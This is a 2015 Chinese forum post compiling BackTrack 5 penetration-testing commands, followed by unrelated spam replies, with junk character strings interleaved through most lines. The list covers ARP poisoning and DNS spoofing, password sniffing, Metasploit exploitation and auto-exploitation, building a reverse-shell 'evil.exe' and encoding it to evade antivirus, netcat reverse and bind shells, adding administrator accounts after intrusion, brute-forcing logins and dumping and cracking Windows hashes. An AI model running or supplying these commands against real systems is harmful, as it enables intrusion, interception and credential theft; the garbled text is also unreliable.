返回列表 发新帖

BT5渗透常用命令整理| →『网络安全区』

344.1k 10
kjeittccdf 发表于 2015-3-28 01:43:00|湖北 | 查看全部 阅读模式
whois 域名/ip 查看域名的详细信息。
6 i6 Y, q9 l3 D8 T4 e; v # C1 W6 |# A) I2 x
ping 域名/ip 测试本机到远端主机是否联通。
$ u9 Q) L) A0 Z9 | ) T$ a; ]# p# m
dig 域名/ip 查看域名解析的详细信息。5 C: k$ n. A& h0 F( n8 w
+ {* o# {" [3 J3 G1 C) D
host -l 域名 dns服务器 传输zone。, `, o9 t% z! e! S- _
$ a; J1 @# [0 L" c, D; {# v
扫描0 \, [  N" l+ ^7 u. {4 s5 p
7 P$ X" }; A- N* j! h
nmap:6 G! v' |0 |9 ]. X6 G  I# {* O6 z

" U  O) v! L3 @-sS 半开扫描TCP和SYN扫描。' J- B* W" M2 @- {
- i7 A  \6 @5 O6 P
-sT 完全TCP连接扫描。
* O: `, X2 P* a- x+ J) z% \
' i% m0 _9 K' {' X-sU UDP扫描3 \9 t( l  V! D. Q- p: Q. A

- n) r! q7 @/ ]4 n- L$ ~, ]+ Z3 V-PS syn包探测(防火墙探测)! w# B% I0 W2 n* g# }7 V! e

2 W" u8 V% ?9 a-PA ack包探测(防火墙探测)) T! o: c( g9 A# h) Y7 m! H/ h1 U2 v
2 m/ ~9 t9 e# y/ K0 b1 v
-PN 不ping。
6 y) A7 T: A$ c
" V9 Z) f1 E* C! {+ n-n 不dns解析。& \0 J+ f; B4 y& @1 a1 T
, x+ ~+ j, l( D" I# L9 Y! h
-A -O和-sV。' u9 x! v$ C0 @+ X1 P" o

& E" v& @: K1 F# m, O* C/ k-O 操作系统识别。$ ?0 [7 e! I. m: a8 v
) H# z9 d2 {9 u2 L9 l6 V1 e
-sV 服务版本信息(banner)
- j3 b) e8 p6 H0 }* \7 h5 w
% q3 v, Z( G$ ?$ P-p 端口扫描。8 D3 n5 d' x: i7 {  {! k
8 D$ }9 Z" F( q0 @! \) s
-T 设置时间级别(0-5)
) c6 V! `8 ]) H3 O/ `( a 4 W: y+ E6 ^- p  u9 }  a5 |
-iL 导入扫描结果。; \, g. g3 p( u
+ |( N& v) _+ p  J
-oG 输出扫描结果。: z# E/ F6 I2 o2 v, x# J* \
, G3 ^- X' ~) o" s3 \4 P

% M0 K1 c# i3 O: r- [" O
* i1 P2 q+ J' e+ ~6 {$ q8 c操作系统识别:
3 b4 m* S8 Y$ O
; _/ I3 m# }3 S7 h  c" gp0f -i eth0 -U -p 开启混杂模式。$ W, Q, I3 m% y! I! [9 ^7 r% E

6 a9 y2 h+ K3 n- T7 |9 J$ sxprobe2 ip|域名 检测os。9 ^+ C7 }! F7 ~2 Z! V8 p
& t1 V5 o# }1 x/ R1 h
banner获取:( n6 F. J) |. r2 O* X4 Z

( z- }4 s7 {) Y! [- `nc ip port  检测端口是否打开。
. T2 P, D4 O" d" C) V $ f/ Y3 w( P6 k, ?( \! _
telnet ip port  检测端口是否打开。
: r; E! W9 i* w4 P4 y2 ?( W( x' t& ^8 l
5 H- C( @! x4 ~8 F7 r- Iwget ip  下载主页。& j7 O, P' I. f! @! j4 B
+ v) h  Z  q% H' h+ v
cat index.html | more  显示主页代码。0 k/ k" O' T6 f& l
1 \& f& F# L- q! z* d/ I8 L
q   退出。( l6 k: K- S3 l: a' {' z; o

( i: G$ w; _, I7 Z- X2 }& ^windows枚举- i( N! v: P8 F9 [! t% @  p. [

; e1 p9 n% P( ~/ P0 G, Wnmap -sS -p 139,445 ip  扫描windows。
- Y3 {5 T/ j: I7 D7 ^" q$ ~
$ R) _6 c( _+ [( _" Kcd /pentest/enumeration/smb-enum   A; p, h  L) ?3 l

  n/ Q2 H+ A+ t" h1 _! enbtscan -f targetIP  检测netbios。1 _, P5 v2 d7 ?1 p6 g

+ T  \5 e9 O! u! k! X' b& l& Hsmbgetserverinfo -i targetIP  扫描name,os,组。
, `$ _4 }8 q1 L) W9 u( @ 2 ~# }# e* \$ ~
smbdumpusers -i targetIP  列出用户。& Z0 h* m. ^5 @4 |$ x) X3 G  L

" R; d5 _6 p* {  y4 C  lsmbclient -L //targetIP  列出共享。
+ I, H- S9 R6 q7 B
9 ~. I6 g. I; X$ X% U使用windows:
. l: o: ?- s% Z. k
) \* d' g. J2 r6 l' V' [2 n$ W. Znet use \\ip\ipc$ "" /u:""  开启空会话。% W. a8 b4 w2 r  B
- Z  ^+ g* M3 {
net view \\ip               显示共享信息。
: E5 d- T$ K# p- ~7 ?9 e. W- W7 v4 S
! B* Y& Y  h; ?( k( I, g. Msmbclient:1 e7 z8 Q8 C/ L8 D' p; j, J

. |9 k, P  L. B; ]8 O6 C, M- P8 Usmbclient -L hostName -I targetIP 枚举共享。
: b9 e+ l) ^; Y/ ] ( C( V7 V& I7 N; ~, o$ U
smbclient -L hostName/share -U "" 用空用户连接。
4 D5 {5 q+ _4 y4 Q: i* ~1 t# S
( j) Q  n& R( T, Q. zsmbclient -L hostName -I targetIP -U admin普通用户连接。
  K( Q3 a3 m! }* f& g
# J* W# I; W' _! Urpcclient: 7 W3 v4 x, A% k5 u0 o0 Z) _7 L
$ D$ Z; x: {' w9 f8 y
rpcclient targetIP -U “”打开一个空会话。: a6 I0 O# c$ [: h& \9 ]  w
# J/ c/ S" p: V+ i$ M" N
netshareenum  枚举共享。
$ C; n- G# z" L$ Q( _ 7 h  Z( O8 h) U: j6 Q7 U
enumdomusers  枚举用户。8 i7 _, }! T9 T  x- E
/ [7 i7 |' O. x* y1 h+ {
lsaenumsid    枚举域SID。; ?, I& Y' R; M! @2 N

) _& P. h- b8 j7 }3 B5 L; c* Oqueryuser RID 查询用户信息。9 e1 b3 m1 d7 e9 j/ G( q

- M: e$ c2 X5 x9 I2 |- q& Y: L9 dcreatedomuser 创建用户访问。
9 d2 [/ \) Q8 z2 C, a4 Q
3 ~6 g6 l4 o' W4 PARP欺骗:
* _+ r# I  O  M- V2 }; w  w
5 n1 y7 X/ P2 B1 a; vettercap:( U* e5 J9 X" X, Q# t' l5 A
6 }! }8 @2 }" G9 D" H3 p
nano /usr/local/etc/etter.conf配置文件
$ Y$ J, J/ _9 z" z! J   Q/ A. e# L; F$ }
Sniff > Unified sniffing > Network interface: eth0 > OK  设置抓包的网卡  U( Y2 o9 z3 ?; u  \/ Q1 d/ k

2 l; X: v' k0 @9 p' cHosts > Scan for hosts (do this two times)扫描网段的主机4 b3 \, _& j% ]& B8 k9 f

4 `/ `0 {0 J' s4 X7 FHosts > Hosts list 显示主机列表7 I! R/ X& t* O+ {/ ^: q
! B" }) n0 g: C& U& Y1 S; G
Select the default gateway > Add to Target 1 添加主机. `; Z4 c  B* ]  K( ]* g( G% A- K
5 e7 z1 u! O: T5 o# [, [. B! I
Select the target > Add to Target 2 添加主机6 B+ i! }5 Z% t( f' t2 [2 Y4 J& Z

6 h" g4 F6 U+ n/ @0 h+ I& nMitm > Arp poisoning > Sniff remote connections > OK  设置ARP攻击' ]7 V0 ]1 o  M, Y7 w

) k9 p3 J; f! ~3 VStart > Start sniffing 开始攻击
5 t2 V4 ]  O" ^# }- D8 U
8 M. W# _3 G1 F1 ^dsniff -i eth0 监听网卡窃听登录用户密码
6 k* h3 ^4 l( t/ J! w   K" b4 i" ?$ V0 [3 ]$ h9 X' S7 S: s8 t
urlsnarf -i eth0 嗅探http请求9 Z, L3 L6 N  Y; |: Q

& B: x9 b2 v( S6 u# N2 Mmsgsnarf -i eth0 嗅探聊天软件的聊天内容
: Q8 P0 L: r9 q( { . \8 U7 W3 Y; F' v
driftnet -i eth0 网络管理嗅探图片,音频。
5 J9 `+ h+ `& w' F7 A9 \  g5 M - T4 D7 k# s* d0 {* U# t5 @- O
nano /usr/local/share/ettercap/etter.dns编辑配置文件: p# m- Z1 ]( K/ S/ ~
1 u$ ~2 `0 b* P2 w: B0 [/ K1 {
Plugins > Manage the plugins > dns_spoof 设置dns欺骗
! O" q% v" `6 u, }3 x- M0 M9 K& Z
5 k" [3 d2 g: d1 eMitm > Arp poisoning > Sniff remote connections > OK 设置ARP5 v6 j7 [, F4 x6 Z$ |

& [" A6 Z: P( a) A4 jStart > Start sniffing 开始攻击4 R/ l4 E3 j: x3 _3 [' w+ V4 _
; o6 b$ B4 N- H. ]! u# w
. B+ J2 d$ n$ V2 }4 \& _% l* ~1 ]

' D6 ~+ Q: e2 q* ^* H' VExploits漏洞利用:) D  \2 ]/ N; ~4 `9 N
1 Y5 H% g, e& K+ y1 Z
cd /pentest/exploits/exploit-db 进入目录
' x, i! {" D+ {( M8 x+ Q
3 @4 S; M; c, a- H3 K, c8 C* i$ scat sploitlist.txt | grep -i [exploit] 查询需要的漏洞
! A+ t& K0 A: H$ v2 e  M: ~! a- z
2 H; g3 e$ |( e3 Mcat exploit | grep "#include"检查运行环境5 ^/ Z! e0 u! a+ z# L* ^! ~

9 K6 O0 b. b$ `3 I* ]1 b: dcat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可以在linux下运行的代码
' `/ c$ J* z0 H* w! g
9 t) _, T5 B! z; m; k$ P) @" {' C $ F0 m# e+ ], ]8 m

9 X) {5 V/ v; P$ A- K: R* xMetasploit:
+ [- C4 Y6 e/ y, G( _9 } 5 w- T4 a  s" U
svn update 升级 / m3 m6 y4 ?1 y! F
3 w& I3 c( b. A+ q+ R9 S: a9 R
./msfweb Web接口127.0.0.1:55555。.
: c" s2 ~9 X4 K5 k9 i( N ( F$ A. {- e! b9 |) u" w; M' U" t
./msfconsole 字符下的Console。
! R. T2 o6 Y* w' Y- L & Q  n0 ^) V4 C' \
help 帮助
* m. r9 N# \$ ?: j. m, u, X
7 h! Q8 Z) |6 o% x+ c7 q, T7 ?7 C! T3 Dshow <option> 显示选项
+ m/ x# O& @5 b1 C / H- {3 C$ [0 ?
search <name> 搜索名字
# n  J, j& a& K7 m. u
2 T" z, D4 v# M) V1 ^! F" Z$ ~use <exploit name> 使用漏洞
  Q- S( Y! v: m- F
9 E' v, n! X' L' c- t$ v% Hshow options  显示选项
2 P6 Q' x9 _- ]! A0 Q4 S
! P7 F& O. L; X6 I1 Xset <OPTION NAME> <option> 设置选项
8 B5 F$ k6 Y( H
5 Y6 M2 x( f/ j8 s# |3 j  ^show payloads 显示装置
" G% r6 D6 E5 X) z0 C" B" y5 Q0 G" G
1 r) r, b) E6 N; _) qset PAYLOAD <payload name> 设置装置1 W8 P6 }* @0 v

% t  K! A/ ~* Gshow options  显示选项' W7 @" r: _. q( G9 i( }6 v

0 X9 ~; Y9 Y0 [$ o; V$ z0 wset <OPTION NAME> <option> 设置选项
$ K. e. h7 t* I4 @7 `( Z
- |* x' ]8 T5 Yshow targets  显示目标(os版本)
0 ~/ W1 d1 c( A" ]6 v; \5 D9 e
( N" z8 D; n* {  A/ cset TARGET <target number> 设置目标版本2 l6 S" w6 Q( F. s( u0 ~
) V; ~! q* J7 P; W1 h
exploit 开始漏洞攻击
! ?/ a) P$ _. _" U) s; n   q' F9 D$ [8 T5 c' ^1 Q
sessions -l 列出会话
: O8 \" T# p& r9 m * M+ k( B0 I- Z4 T$ b) W
sessions -i <ID> 选择会话
* o: w+ ^) }% ]
& [# o" Y, r! L& tsessions -k <ID> 结束会话
: B3 Z" @% L' ] 6 ^4 S- i1 u! o  e* X# p8 V
<ctrl> z  把会话放到后台
* @" _' n$ y/ y" m4 @" S* \ 5 O: H+ T+ X0 N9 O/ K
<ctrl> c  结束会话
: w8 P, ?* z8 a. T' k/ e7 O( w8 }
$ o2 E3 W2 D2 R. E+ gjobs   列出漏洞运行工作1 q0 T3 ?, p. g% z6 s4 C! N. y1 }

$ ?1 m- ]( v) S% gjobs -K  结束一个漏洞运行工作2 [4 S2 L6 \& D0 i

  m3 _8 e, Z& \. g1 ~8 f) R  Ashow auxiliary 显示辅助模块6 x9 W, |3 [5 d- K

( y$ z4 q. N  D. c: w, Quse <auxiliary name> 使用辅助模块
  z# j$ O$ _' Y( j4 e: e: y + n/ [, Q) n* s: e, Z! X& \9 L) |
set <OPTION NAME> <option> 设置选项
9 W) }1 I" U) c8 s5 d
# L, Z  ]3 P8 a( `% {2 v* d( @run  运行模块6 T) e; J5 x7 ~* C" L0 V6 U$ y

5 g) E) ^1 s% R% [/ Zscanner/smb/version 扫描系统版本9 o3 j- y& {, `! Z8 N; e' ^

$ O( n# N7 ]; ]9 a, ?scanner/mssql/mssql_ping 测试mssql是否在线
, j; m4 ^* Y! t$ u, A: B " g+ Q, s) T$ L' c: v. V2 N
scanner/mssql/mssql_login 测试登录(暴力或字典)
& q) h7 k% w  d$ Q4 _- b, U % P; V3 i: Q7 F. Q
Attacker behind firewall:  bind shell正向- z9 J6 ]3 O8 B

2 i/ J) X( p9 Q# E7 }/ y, oTarget behind firewall:  reverse shell反向
- ]$ {, I) Z" ` 4 T5 D) ]1 P. U) P$ \6 q- h/ T! E
Meterpreter衔接不懂dos的可以用这个:
0 {) F. Y/ n, M( N; A ) W$ I! _, u' _2 F
db_import_nessus_nbe 加载nessus的扫描结果
- R8 O! m* e% {1 M 4 J1 [& k8 w! L+ r- Y; G
db_import_nmap_xml 加载nmap的扫描结果, h6 N+ i3 E; X9 O
' z1 C; N: B& D! a; P6 d, I. l% h8 K
自动化攻击流程:$ m4 X: T( W( e6 y7 t3 c3 Q/ P) C

& Z+ }- o! c1 e2 }2 x* B0 e% Vcd /pentest/exploit/framework3
& b. I) U. A1 l: r5 h, F" c & x- R" U+ i! C/ C; D' ?* w
./msfconsole
; z, P7 |+ S1 Z+ z. w $ L, s* h4 T% d$ b1 h
load db_sqlite38 }4 b- j( K4 ]5 ^! N$ q
& U5 {, z4 B, p3 ~
db_destroy pentest; g# K+ A: ?5 o
. p: J1 }7 L% A" U  q
db_create pentest5 P: p/ M) R  |9 g; \# p  O

( B: y; t( X* ]2 S  Ydb_nmap targetIP
0 v. V# I0 c; g9 q/ v6 e
' \4 A9 p5 g8 A" [. I: Qdb_hosts  h+ k! p( d  A/ k0 H& Q
! N- e& A" d7 q0 S* T) d. f
db_services
$ r* c. t6 A. ~2 e6 C & ?$ W3 [8 q. k/ n. _- f
db_autopwn -t -p -e
7 R! _/ Y' _' Y  {9 q" u 1 ~$ m- V+ W0 E5 Z* y7 h6 |
字符接口攻击流程:
) m" {7 g+ V9 M# _3 e. v- }" a
9 p" Q1 v# [& g./msfcli | grep -i <name>) T8 ~' u2 V4 ]# m3 f1 @' g

/ D6 ?' ^& Y* o; `' s  T* }./msfcli <exploit or auxiliary> S
+ w1 o' D) Z# {1 @! \+ ^8 N/ v
. q' L1 p$ e$ O: E: d./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E
3 W% d9 x" @0 D7 B7 J+ S7 k ) _" }* u* H; N2 k$ t
做木马后门等:
, l# {5 ~) t/ }* K; ~' n% W) ] 5 i. h; v# Z$ B5 q# A- h
./msfpayload <payload> <variable=value> <output type>6 \, V7 v" {) z1 s
7 s5 j& J; T( S# l/ E" m
S        summary and options of payload5 R5 o! f% W! V( O4 [2 D# I$ i8 N
* V# s4 p/ v$ O3 [& ~; }5 T2 k
C        C language
- f6 x/ f- d. K( k: Z" u; z8 J
3 V9 n$ p$ c* q6 {; ^P        Perl8 ]( j0 c. j; s- [  N) o$ \0 F
" W4 c- H. t% L5 `" d  u1 ]: G7 h
y         Ruby+ ^) a3 W8 a* N( V# V6 w8 [& s) |
) l: l  t. j* V2 E$ @0 p
R        Raw, allows payload to be piped into msfencode and other tools6 C+ {! g8 B4 i2 W# N

. r/ Y- x2 X& Q! R/ ?- ]J         JavaScript  w; H. J3 M6 M
9 L: o  H) G- x- r! @* ^1 S
X        Windows executable' J8 x  _! k2 V- ~$ R9 R  c- l. }

# l8 w) B. ?* J' {$ z7 Q3 Q( A./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C( p6 \* i) Z- k/ n

  |$ r9 |: W8 x% e9 Q./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe
4 M  L0 L2 {. O2 D9 p
7 q. }) z- j# ^* v4 a3 N$ H编码处理就是做免杀:
: ^. u$ s5 c5 n' v% _% u0 X
# @1 U' ^; P4 r: g8 e./msfencode <options> <variable=value>6 y/ R# K8 @. y- x9 @. H* m4 @7 Z

$ C3 l8 b: |, K6 x% t./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b &#39;\x00&#39; -l
$ [$ v7 z* _3 l, o# M% Y% o
$ r. n( I5 ^0 Y: L./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b &#39;\x00&#39; -e PexFnstenvMor -t c
4 X/ F& e' N4 x7 `) V3 f" T , K/ @7 r  Y5 E9 z
; ?) w+ o( _7 \2 B& `5 I( v

8 l- k( `* Y9 q/ S# a入侵后在windows下添加管理员用户:
! o2 ]) w4 M& l5 E. ^4 w ) U$ B$ q4 ]: P& w/ O' G
hostname 查看主机名) \# _# C0 `' {1 S. Y# l& @; U" ]

8 @8 ^- k8 _* X' z, E3 enet users 查看用户
* d1 a+ Y! Y8 K% {/ d
% B) u# `  A! }- g, ~net user 用户 密码 /add 添加用户
- i; ?7 v4 Y6 a9 Q1 a" i
0 v  |1 X8 o1 Q8 g" ~$ tnet localgroup 查看工作组! u: P7 L$ ^) N- ~3 @3 D
+ p; y9 ?# p; [/ P' y
net localgroup administrators 查看管理员组
( p9 A7 X& _3 M$ L
# h/ N0 y/ P2 X8 g4 M1 Enet localgroup administrators x /add 将用户加入管理员组
! a( ?# R  j# F$ m& Y% ]
- T! l) t. v9 ] 0 q: _4 Y0 W1 e  J4 g- Q0 f

- d4 }" Y- f  |6 c* J& xTFTP
0 b1 L8 _+ H( S% a* N( h2 d0 L& C5 i ! j% w$ h: V( q: D) W
cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上
8 P3 |3 c: [6 F: N( u" }7 E( g
& h- I- j9 \. L2 a! G( htftp -i 10.1.1.2 GET nc.exe下载
, L" H2 P  a  o2 ^( R0 E4 T
3 Y! O, i: u8 g3 r" {  ]- d3 xnetcat瑞士军刀
3 W% Q0 c- ^+ `) |) i- P
  n: Y4 ]: }, c0 ^attacker:  10.1.1.1 ! n( \5 S) _, Y
2 O6 \9 h! i' Y: ^" Z
target:  10.1.1.2# s# h. V& e$ k; D! y* y7 V

( g& i& U) D/ \" C1 qnc -v -z 10.1.1.2 1-1024 端口扫描
$ g1 S4 h' b* W9 p, \$ S/ t 8 ~9 Z1 z, P1 M* e! U
target:  nc -lvp 4444 聊天设置(服务)/ U0 Q5 E4 R1 a- n0 J6 W" G
, ?0 x# p, a) P; h' Q6 D$ r
attacker:  nc -v 10.1.1.2 4444 聊天设置(客户)
; ^9 Y2 S' Z5 } # c0 |' ]6 X) a" F% K. b
target:  nc -lvp 4444 > output.txt传输文件(接受)
8 H9 _* V3 B2 X- c  {# D3 J$ o 8 x6 |+ \9 y3 _  X
attacker:  nc -v 10.1.1.2 4444 < test.txt传输文件(发送)" D, N2 Q6 ~* r$ l
& I4 l6 ~/ z/ \, i2 m
target:  nc -lvp 4444 -e cmd.exe  Bind shell。1 a- M! K3 d8 r: G1 P1 A% J) u2 j
! A) v  ?7 i/ u0 r( U- w
attacker:  nc -v 10.1.1.2 4444
8 d$ k" h/ l) ~  v
: p7 f5 L8 Q3 C$ [4 P2 Htarget:nc -lvp 4444  Reverse shell。9 s$ F8 ]# v. H. p( S; f$ f

! x  M9 K  Y+ F2 ~attacker:nc -v 10.1.1.2 4444 -e /bin/bash
7 c6 h. t2 v7 t3 x/ n( R2 j0 @ 3 O" g. Q: a3 X
0 a0 T. n( q+ F: s4 Y

: Z6 P! v; z. x' n& J密码
2 P9 \0 ~. s6 L 5 O. V1 T6 e6 O+ P
字典zcat /pentest/password/dictionaries/wordlist.txt.Z > words: D$ r. T3 `/ `& E0 P

8 \* n5 L; p' V3 q( s! ]cat words | wc -l显示个数(30多万个)     
' V/ M, l% y1 C1 b" u( I
6 z; j5 `. G# M) i4 P暴力:  J+ b! v% F0 \, Z  t

7 o% |9 [$ {# \/ ]$ I% n% Uhydra -l ftp -P words -v targetIP ftp 攻击ftp。$ G: w3 L7 V# s. K8 K1 ~8 D/ g7 Q

. A9 O- F8 y, T9 h" D# Rhydra -l muts -P words -v targetIP pop3 攻击pop39 Y  f! v) _7 J
" b! u; t: ?! }& _7 i9 c* T  l
hydra -P words -v targetIP snmp 攻击snmp
$ _* g. q  Y/ I+ ?% d, {4 o/ g
9 j6 y+ U( l: X攻击microsof VPN5 E* K3 o" d5 u8 w2 ~9 o

+ w7 ?) U4 |4 a/ W0 y! \6 l" Knmap -p 1723 targetIP1 R8 b( `1 J. _: L- ?8 f6 ]9 ^" Z
6 e5 L7 O5 C& M' O# J$ M( V5 \
dos2unix words9 k. Z( d3 N- J) j& \
- d4 Z) {! W+ r
cat words | thc-pptp-bruter targetIP
9 a5 W0 Y; x' F9 h2 F( r+ H: Q/ m0 B 4 u( @0 B+ Q$ @# V# j
WYD:4 A+ W$ f& [4 E2 I4 [

; b) p) x( u) U! ]wget -r www.target.com --accept=pdf 下载pdf文档* b- \$ H8 e  S6 C" j. v8 k
4 C/ O. c; I7 s
wyd.pl -o output.txt www.target.com/
( U4 R) K8 {' |1 J5 M. V
  ^, N+ g3 c' i' n$ \8 I" }* W) Qcat output.txt | more- h! K' p3 R4 c9 y
: K' L! |5 U. K' v- U1 \6 i6 N) V: W
SAM文件(windows下的密码文件):, f2 R9 h# p  r7 {( G# `: {3 {
5 ]' h. \- F3 l" s4 _1 R$ @/ Y
%SYSTEMROOT%/system32/config" G6 W6 }0 f7 A4 I& S# b' S

; O9 R+ }/ }7 K: p! `$ e4 _%SYSTEMROOT%/repair
! V3 ~* @" u- C* ], c3 R" _1 y : w, Z% h: g  Q) q- z3 l3 ?
备份windows的hash文件:
" ^/ R1 Z/ s% u/ D$ }  ^5 O 2 X4 r% f% F! {' b
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E, S0 e, S9 n, |& M8 o
; a4 F( ~5 t, {* q& L4 @' V# K
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\
1 I1 m+ Q  {. E+ R2 a9 _ $ A4 |8 k4 a' B! G) |# T
meterpreter > execute -f cmd -c
5 C! D+ v6 I3 t( E( M2 w , k; Y- p% [& J  V4 j% }' [- F/ f
meterpreter > interact x2 ~+ B! \1 s9 s- F8 p  X: t  J

& }" z2 @, d6 `( Z+ F7 ]C:\WINDOWS\system32> pwdump \\127.0.0.15 r% [& A% X, }5 q1 A
' V3 Z2 o, ]' d. Q
john破解密码:
: F0 O  r" [7 d# n$ }7 E 9 y$ y' H9 ^- v6 V8 l
cp hash.txt /pentest/password/john-1.7.2/run/
6 h: U9 o) U. a, t% Y ) ~/ a* j$ j, `5 q: [$ K8 K7 [
cd /pentest/password/john-1.7.2/run/
. U1 i4 c. X# S7 q" G2 H6 Q' d # `! w# a5 s$ c7 D. Q+ g! ~( T# ~
./john hash.txt' W7 m1 `8 @0 ^2 i! q, g# B4 U

9 I: m% f( U0 `* V1 P; G" Z  M6 I  Z& d彩虹表:/ M% Q" F/ ?! q1 n4 O# B

' ^& y+ g" e9 f" v! crcrack *.rt -f hash.txt/ G! T! V5 `% s

; P8 d) |) }# n* X
0 p' c. i( R: E) x: P8 |0 K3 B7 {  Q
: }) N* }4 i7 w; [% {# w' B本地修改密码:# K8 V, @6 o6 d& R: y( t6 h

8 }1 Y: z3 b% x2 R5 b1 Pmount
8 @) E0 S# j2 L) p. o ! Y: L( o$ T; t
umount /mnt/hda1
% d; e" C# }! ]7 @9 M
; s5 |" `9 I2 o( L* [; |4 T* gmodprobe fuse
# f& [' }( H7 v0 n2 u$ W! k , m0 O! N) Y; c- X
ntfsmount /dev/hda1 /mnt/hda1! [) B, j' T+ q+ j5 F5 Y
+ M, x* B9 E+ R7 Q
mount

回复|共 10 个

亮凌庚 Lv.15 发表于 2015-6-23 22:00:05|日本 | 查看全部
哈 你逗逗他啊
kwjvtwzx Lv.15 发表于 2015-6-23 22:00:51|湖北 | 查看全部
baidu是相当能折腾我了
efiew Lv.15 发表于 2015-6-23 22:07:09|法国 | 查看全部
挨骂也是幸福~~~
swmozowtfl Lv.18 发表于 2015-6-23 22:08:57|德国 | 查看全部
我怎么就踩不死你呢??
xiaoye Lv.9 发表于 2015-6-23 22:24:12|日本 | 查看全部
本人过去、现在以及将来都不认识楼主,且自古以来与楼主无利益关系。楼主表述之事与本人无关
gevaemaidovef 发表于 2015-7-25 18:00:25|美国 | 查看全部
哦...这个...偶昨天就看了....
bqtklouu 发表于 2015-7-25 18:15:57|Reserved | 查看全部
楼猪.重量级人物阿.
wwdu926a 发表于 2015-7-25 18:16:58|INNA | 查看全部
嘻嘻~` 要是只看你的话~`~`` 很容易让人家以为你也跟偶们一样是天使类~`(偷笑中````````
buingeEvineus 发表于 2015-7-25 18:20:08|哥伦比亚 | 查看全部
好吧...那你说...
kpasd Lv.3 发表于 2015-8-28 22:40:30|山东 | 查看全部
谢谢了。。。 我很赞成,继续努力吧
' H5 g- s% c: l6 z" a% l- s; U% g% L) d; Z" `5 J2 ^
. O8 h( \5 M+ R3 v5 Z' T
0 c4 H  `) t9 X# R0 `; U% A
! B+ D3 g% A9 u" M1 y

2 T5 ]5 z  C5 \* e8 m' \
( J& _4 c. ~" K8 o7 w% K  O' h4 J9 B* g

$ V, N. f$ Y, J. U* H  [
1 h; S8 j! |( P- a* M, t
* n' k$ n. j9 N" R* A1 ~9 @4 ^# d5 j$ e/ Z3 U! U3 k# c) |
, F: U: g' w# r% S7 C
                               
登录/注册后可看大图

2 b- L6 ]! s$ }! Y
5 W$ ?" G- W' V' w! ]2 R
                               
登录/注册后可看大图

回复

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

得知互动是一个融创意、设计、开发、营销、生活、互联网于一体的专业交流分享平台。
Copyright © 2026 得知互动-专注Ai与站长技术交流社区-Ai交流平台 版权所有 All Rights Reserved. Powered by Discuz! X5.0 鄂ICP备15006301号-5|鄂公网安备 42018502006730号
关灯 在本版发帖 扫一扫添加QQ客服 返回顶部
快速回复 返回顶部 返回列表